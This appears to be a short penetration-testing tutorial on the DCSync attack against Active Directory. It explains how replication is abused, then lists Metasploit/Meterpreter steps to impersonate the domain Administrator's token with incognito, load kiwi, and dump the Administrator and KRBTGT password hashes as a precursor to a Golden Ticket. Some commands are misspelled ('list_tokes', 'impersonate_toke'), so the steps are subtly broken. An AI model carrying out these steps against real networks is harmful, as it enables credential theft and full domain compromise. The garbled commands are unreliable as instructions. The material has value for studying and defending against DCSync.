DsSync With Metasploit from NT Autority/System to Administrator
A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.
These attacks leverage what is a necessary function in Active Directory, which complicates attempts to prevent them. Large-scale networks require many DCs to function, and each of those DCs need to have up-to-date information. That requires a function allowing one DC to update another DC on any changes, like updated credential information.
Attackers subvert that necessary function by pretending to be a DC and using the DSGetNCChanges function to request password hashes. A common attack uses this method to get the KRBTGT hash, which brings them one step closer to getting a Kerberos "golden ticket."
DCSync requires a compromised user account with domain replication privileges. Once that is established, one can find a domain controller, tell it to replicate, and get password hashes from its subsequent response.
Initial
session -i 1
shell
whoami
hostname
exit
we are going to impersonate the Administrator
use incognito
#to list all the available tokens that we can use to impersonate
list_tokes -u
Add another backslash before the username \\Administrator
impersonate_toke north.newyork.local\\Administrator
getuid
load kiwi
help
We are going to dump the administrator HASHED Password
dcsync north\\administrator

We are going to dump the KRBTGT HASHED Password
#KRBTGT is the service account for the Key Distribution Service.
dcsync north\\krbtgt

DCSync requires a compromised user account with domain replication privileges. Once that is established, one can find a domain controller, tell it to replicate, and get password hashes from its subsequent response.
DCSync is an attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. The classic use for DCSync is as a precursor to a Golden Ticket attack, as it can be used to retrieve the KRBTGT hash.
Last updated